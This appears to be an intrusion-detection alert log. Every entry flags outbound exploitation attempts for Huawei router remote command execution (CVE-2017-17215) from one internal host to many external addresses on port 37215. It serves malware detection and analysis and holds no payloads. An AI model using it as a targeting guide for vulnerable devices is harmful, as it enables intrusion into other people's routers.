                                                    07/10/24-08:27:22.910234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901237215192.168.2.14157.183.90.227
                                                    07/10/24-08:26:31.051778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993037215192.168.2.1441.44.67.132
                                                    07/10/24-08:27:10.553055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269437215192.168.2.1440.206.29.241
                                                    07/10/24-08:26:59.785283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464237215192.168.2.14197.20.43.118
                                                    07/10/24-08:26:59.877507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276437215192.168.2.1441.101.191.101
                                                    07/10/24-08:27:17.073080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825837215192.168.2.14197.83.171.111
                                                    07/10/24-08:27:07.316362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584837215192.168.2.14121.173.249.144
                                                    07/10/24-08:27:10.535959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483237215192.168.2.14157.138.160.205
                                                    07/10/24-08:27:13.889582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024237215192.168.2.14197.106.240.163
                                                    07/10/24-08:27:24.878204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520037215192.168.2.1474.204.113.242
                                                    07/10/24-08:26:43.574763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818037215192.168.2.1441.78.69.95
                                                    07/10/24-08:26:28.906271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262837215192.168.2.14182.29.71.246
                                                    07/10/24-08:27:08.398717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401237215192.168.2.1441.73.96.134
                                                    07/10/24-08:27:14.815899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773237215192.168.2.1441.158.156.252
                                                    07/10/24-08:26:23.350374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987437215192.168.2.14157.197.126.114
                                                    07/10/24-08:26:57.574047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291437215192.168.2.14221.36.252.39
                                                    07/10/24-08:26:22.224405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371437215192.168.2.1441.137.103.222
                                                    07/10/24-08:26:42.421104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611237215192.168.2.14118.51.35.205
                                                    07/10/24-08:26:49.802589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703837215192.168.2.1473.28.253.141
                                                    07/10/24-08:26:52.009687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897837215192.168.2.14197.232.140.192
                                                    07/10/24-08:26:52.093940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071437215192.168.2.14197.14.245.4
                                                    07/10/24-08:27:05.096875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733637215192.168.2.1441.79.198.48
                                                    07/10/24-08:26:42.404387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493637215192.168.2.1441.4.108.235
                                                    07/10/24-08:27:02.891587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576637215192.168.2.1438.95.188.64
                                                    07/10/24-08:26:14.809992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836637215192.168.2.14197.204.163.3
                                                    07/10/24-08:26:45.603395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181637215192.168.2.14157.157.246.107
                                                    07/10/24-08:26:55.385824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022637215192.168.2.1441.86.248.87
                                                    07/10/24-08:26:42.426125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587437215192.168.2.1441.81.117.118
                                                    07/10/24-08:26:22.260584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321437215192.168.2.1441.16.210.150
                                                    07/10/24-08:27:20.445959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916037215192.168.2.14197.51.35.223
                                                    07/10/24-08:26:48.005447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132437215192.168.2.1441.164.110.108
                                                    07/10/24-08:26:28.788694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175637215192.168.2.1441.198.154.130
                                                    07/10/24-08:27:23.968109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379837215192.168.2.14157.231.43.13
                                                    07/10/24-08:26:43.932722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717837215192.168.2.14197.12.97.188
                                                    07/10/24-08:26:31.105929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645437215192.168.2.14197.25.253.88
                                                    07/10/24-08:27:24.948023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581237215192.168.2.1441.194.252.200
                                                    07/10/24-08:27:24.882807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540837215192.168.2.14157.245.46.200
                                                    07/10/24-08:27:30.486969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854037215192.168.2.14197.21.14.109
                                                    07/10/24-08:26:28.834790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106837215192.168.2.14197.42.250.251
                                                    07/10/24-08:27:05.190892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926237215192.168.2.14157.170.102.139
                                                    07/10/24-08:27:33.778513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204837215192.168.2.1459.201.147.247
                                                    07/10/24-08:27:30.510800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812837215192.168.2.14157.8.176.43
                                                    07/10/24-08:26:33.177669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389437215192.168.2.14157.112.129.116
                                                    07/10/24-08:27:14.867755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522637215192.168.2.14157.84.175.54
                                                    07/10/24-08:27:14.026941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386837215192.168.2.14157.106.148.189
                                                    07/10/24-08:27:30.558808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6012637215192.168.2.14110.137.196.250
                                                    07/10/24-08:27:13.858837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945237215192.168.2.1441.204.88.56
                                                    07/10/24-08:27:02.834803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320637215192.168.2.14154.41.83.14
                                                    07/10/24-08:26:55.322019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429237215192.168.2.14157.40.148.235
                                                    07/10/24-08:27:33.839511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744037215192.168.2.14210.116.158.72
                                                    07/10/24-08:26:20.090184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411237215192.168.2.1441.169.56.131
                                                    07/10/24-08:26:38.552864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446237215192.168.2.14157.155.38.214
                                                    07/10/24-08:26:20.136033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14154.249.50.153
                                                    07/10/24-08:26:49.833735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097037215192.168.2.1463.43.197.31
                                                    07/10/24-08:27:02.743093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001837215192.168.2.14157.48.157.12
                                                    07/10/24-08:27:33.744457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482037215192.168.2.14217.72.193.11
                                                    07/10/24-08:27:14.829159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482837215192.168.2.14197.53.10.149
                                                    07/10/24-08:26:11.515884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676037215192.168.2.1418.58.222.60
                                                    07/10/24-08:26:38.605260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949437215192.168.2.1441.7.18.228
                                                    07/10/24-08:26:41.285291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855837215192.168.2.14157.233.134.10
                                                    07/10/24-08:26:42.428149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525037215192.168.2.1441.231.211.74
                                                    07/10/24-08:26:23.355050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567037215192.168.2.1441.58.91.209
                                                    07/10/24-08:26:14.804457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473437215192.168.2.14197.97.197.90
                                                    07/10/24-08:27:07.389277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944037215192.168.2.1441.145.118.155
                                                    07/10/24-08:27:23.493040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470837215192.168.2.1441.121.73.114
                                                    07/10/24-08:26:11.595518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857037215192.168.2.1441.128.34.69
                                                    07/10/24-08:26:47.994983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974237215192.168.2.14142.215.0.104
                                                    07/10/24-08:26:49.805263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393637215192.168.2.1487.13.73.62
                                                    07/10/24-08:26:49.832031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933237215192.168.2.14197.230.57.2
                                                    07/10/24-08:27:36.285342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771437215192.168.2.1441.187.31.1
                                                    07/10/24-08:26:57.583179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683237215192.168.2.14157.215.138.130
                                                    07/10/24-08:27:24.860339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.14105.147.35.133
                                                    07/10/24-08:26:42.450932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629637215192.168.2.1441.91.131.183
                                                    07/10/24-08:26:15.877145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188437215192.168.2.14157.169.153.243
                                                    07/10/24-08:26:15.824245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091437215192.168.2.1441.86.211.212
                                                    07/10/24-08:27:28.171262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101837215192.168.2.14191.240.35.219
                                                    07/10/24-08:27:32.577578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425437215192.168.2.14209.166.121.166
                                                    07/10/24-08:26:18.023692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440437215192.168.2.14157.208.20.27
                                                    07/10/24-08:26:15.867804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203637215192.168.2.1441.161.75.221
                                                    07/10/24-08:26:59.610357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228837215192.168.2.14155.66.138.150
                                                    07/10/24-08:27:10.621432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733237215192.168.2.14157.26.233.205
                                                    07/10/24-08:26:55.451906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381037215192.168.2.1447.57.142.188
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907237215192.168.2.14157.63.160.5
                                                    07/10/24-08:27:02.789952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240637215192.168.2.14197.183.50.77
                                                    07/10/24-08:26:59.605859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791437215192.168.2.14197.169.149.135
                                                    07/10/24-08:26:11.661383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627637215192.168.2.14197.239.231.22
                                                    07/10/24-08:26:33.231407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985837215192.168.2.1441.200.159.60
                                                    07/10/24-08:26:14.795320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542837215192.168.2.14197.19.208.246
                                                    07/10/24-08:26:17.928888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069437215192.168.2.1441.0.87.146
                                                    07/10/24-08:27:05.090396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816437215192.168.2.14197.38.85.178
                                                    07/10/24-08:27:07.344618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727437215192.168.2.14197.238.239.217
                                                    07/10/24-08:26:28.834790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566837215192.168.2.1495.238.112.52
                                                    07/10/24-08:27:14.885160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472837215192.168.2.14197.20.25.14
                                                    07/10/24-08:26:31.076000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277037215192.168.2.1441.41.31.30
                                                    07/10/24-08:27:32.610911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153237215192.168.2.1441.144.235.152
                                                    07/10/24-08:27:13.986836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096837215192.168.2.14157.19.24.48
                                                    07/10/24-08:26:29.847000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064637215192.168.2.1441.91.235.25
                                                    07/10/24-08:26:26.557067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497637215192.168.2.14197.13.96.57
                                                    07/10/24-08:27:32.476844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978837215192.168.2.1441.145.11.22
                                                    07/10/24-08:26:11.628509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254637215192.168.2.1441.74.79.224
                                                    07/10/24-08:26:14.762388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558237215192.168.2.14157.105.127.136
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474037215192.168.2.14157.86.9.19
                                                    07/10/24-08:26:23.352654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494437215192.168.2.14197.19.29.176
                                                    07/10/24-08:26:48.016890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942837215192.168.2.14156.213.128.178
                                                    07/10/24-08:26:17.981356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610037215192.168.2.14157.198.134.187
                                                    07/10/24-08:26:38.586951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197437215192.168.2.14157.214.206.12
                                                    07/10/24-08:26:52.013451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534437215192.168.2.14197.154.247.200
                                                    07/10/24-08:27:13.761850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432837215192.168.2.14157.28.10.110
                                                    07/10/24-08:26:43.680927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403837215192.168.2.14197.202.63.149
                                                    07/10/24-08:26:33.254511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157637215192.168.2.14157.13.126.17
                                                    07/10/24-08:26:17.981356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957237215192.168.2.14122.171.235.219
                                                    07/10/24-08:26:43.861688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957237215192.168.2.14192.204.241.254
                                                    07/10/24-08:27:33.764696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5163637215192.168.2.14157.66.215.119
                                                    07/10/24-08:27:02.927617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769237215192.168.2.14197.30.201.93
                                                    07/10/24-08:26:33.251804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011837215192.168.2.1441.77.34.244
                                                    07/10/24-08:26:11.112995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257437215192.168.2.1441.204.232.11
                                                    07/10/24-08:26:43.878190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722637215192.168.2.14143.12.148.173
                                                    07/10/24-08:26:26.483995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568237215192.168.2.14124.78.19.161
                                                    07/10/24-08:26:47.941527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364237215192.168.2.14171.210.182.24
                                                    07/10/24-08:26:28.926609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586237215192.168.2.14197.102.128.119
                                                    07/10/24-08:26:49.861410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037237215192.168.2.14157.78.177.53
                                                    07/10/24-08:26:28.890895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839237215192.168.2.14157.51.166.243
                                                    07/10/24-08:27:07.316362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678037215192.168.2.14197.190.107.55
                                                    07/10/24-08:27:31.453868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602637215192.168.2.1489.78.62.120
                                                    07/10/24-08:26:33.222774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362837215192.168.2.14197.126.22.83
                                                    07/10/24-08:26:36.424272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466437215192.168.2.1476.1.36.8
                                                    07/10/24-08:26:14.828226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721637215192.168.2.1441.30.169.236
                                                    07/10/24-08:27:24.896247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826837215192.168.2.14197.250.17.102
                                                    07/10/24-08:26:43.542796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093637215192.168.2.1441.143.95.129
                                                    07/10/24-08:26:20.116732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853237215192.168.2.1481.55.82.22
                                                    07/10/24-08:26:22.298145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503237215192.168.2.14197.54.165.237
                                                    07/10/24-08:27:08.365317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899637215192.168.2.14157.3.57.159
                                                    07/10/24-08:26:25.453697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364437215192.168.2.14197.14.95.189
                                                    07/10/24-08:26:59.691821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040837215192.168.2.1441.226.179.127
                                                    07/10/24-08:26:11.558089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816637215192.168.2.1441.90.109.21
                                                    07/10/24-08:26:38.608580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671837215192.168.2.1441.234.20.133
                                                    07/10/24-08:26:51.994247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417437215192.168.2.14197.130.70.229
                                                    07/10/24-08:27:31.534689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582037215192.168.2.1441.1.91.81
                                                    07/10/24-08:26:20.137377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4594237215192.168.2.14197.232.142.234
                                                    07/10/24-08:26:55.462695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976437215192.168.2.14157.249.189.119
                                                    07/10/24-08:26:38.588104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246437215192.168.2.1441.57.75.84
                                                    07/10/24-08:27:14.850693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564037215192.168.2.1417.240.190.141
                                                    07/10/24-08:26:26.501498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753637215192.168.2.14157.34.68.119
                                                    07/10/24-08:26:33.256885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4496437215192.168.2.14157.7.214.60
                                                    07/10/24-08:26:14.816680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315237215192.168.2.14197.140.106.97
                                                    07/10/24-08:26:29.755457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785037215192.168.2.14216.234.20.111
                                                    07/10/24-08:27:31.441274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491437215192.168.2.1441.168.30.79
                                                    07/10/24-08:26:47.966709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473437215192.168.2.14157.190.164.219
                                                    07/10/24-08:26:57.670827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084237215192.168.2.14197.101.39.248
                                                    07/10/24-08:27:13.761850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951037215192.168.2.1441.241.148.238
                                                    07/10/24-08:27:02.853757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134637215192.168.2.1441.81.43.231
                                                    07/10/24-08:26:49.782685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943437215192.168.2.14197.113.128.254
                                                    07/10/24-08:26:55.330413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394637215192.168.2.14197.200.152.233
                                                    07/10/24-08:26:59.804937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410837215192.168.2.14157.118.245.222
                                                    07/10/24-08:26:28.651021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845037215192.168.2.14197.73.184.148
                                                    07/10/24-08:26:28.798195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371837215192.168.2.14157.79.175.89
                                                    07/10/24-08:26:43.655203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14197.149.173.106
                                                    07/10/24-08:27:22.492179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909437215192.168.2.1441.145.131.58
                                                    07/10/24-08:27:28.144364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447437215192.168.2.14218.3.241.134
                                                    07/10/24-08:27:22.909297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857237215192.168.2.1471.124.50.165
                                                    07/10/24-08:27:23.921577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334437215192.168.2.14157.107.190.19
                                                    07/10/24-08:27:22.772225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467837215192.168.2.1441.232.78.234
                                                    07/10/24-08:27:05.083830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738837215192.168.2.14157.56.135.162
                                                    07/10/24-08:26:51.991411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5051037215192.168.2.14157.6.20.166
                                                    07/10/24-08:26:11.463338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422437215192.168.2.1441.254.159.206
                                                    07/10/24-08:26:38.557842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380837215192.168.2.14197.36.159.232
                                                    07/10/24-08:27:21.455167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070437215192.168.2.1441.133.162.158
                                                    07/10/24-08:26:25.433410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210037215192.168.2.1441.89.153.226
                                                    07/10/24-08:27:23.956633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364637215192.168.2.14197.138.254.124
                                                    07/10/24-08:26:33.254680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781637215192.168.2.14197.94.14.33
                                                    07/10/24-08:26:57.583179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647237215192.168.2.1480.214.208.207
                                                    07/10/24-08:26:55.429155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180637215192.168.2.14157.25.77.213
                                                    07/10/24-08:26:20.104603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124837215192.168.2.1441.90.12.44
                                                    07/10/24-08:26:29.860870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964637215192.168.2.14157.10.40.168
                                                    07/10/24-08:27:32.546136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688037215192.168.2.1441.248.188.218
                                                    07/10/24-08:27:32.609585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763837215192.168.2.1441.150.254.67
                                                    07/10/24-08:26:23.351909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933437215192.168.2.1441.68.229.239
                                                    07/10/24-08:26:59.881196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887437215192.168.2.1441.17.244.184
                                                    07/10/24-08:27:13.996261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.14157.252.22.191
                                                    07/10/24-08:26:36.437986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020837215192.168.2.14190.118.191.200
                                                    07/10/24-08:27:13.964289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403237215192.168.2.1457.142.234.142
                                                    07/10/24-08:26:22.283182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108237215192.168.2.1424.220.123.161
                                                    07/10/24-08:26:31.072857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599437215192.168.2.1441.11.78.150
                                                    07/10/24-08:27:10.629470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.1441.46.79.44
                                                    07/10/24-08:26:20.137377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914237215192.168.2.1461.96.144.143
                                                    07/10/24-08:27:02.811235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504437215192.168.2.14157.216.230.237
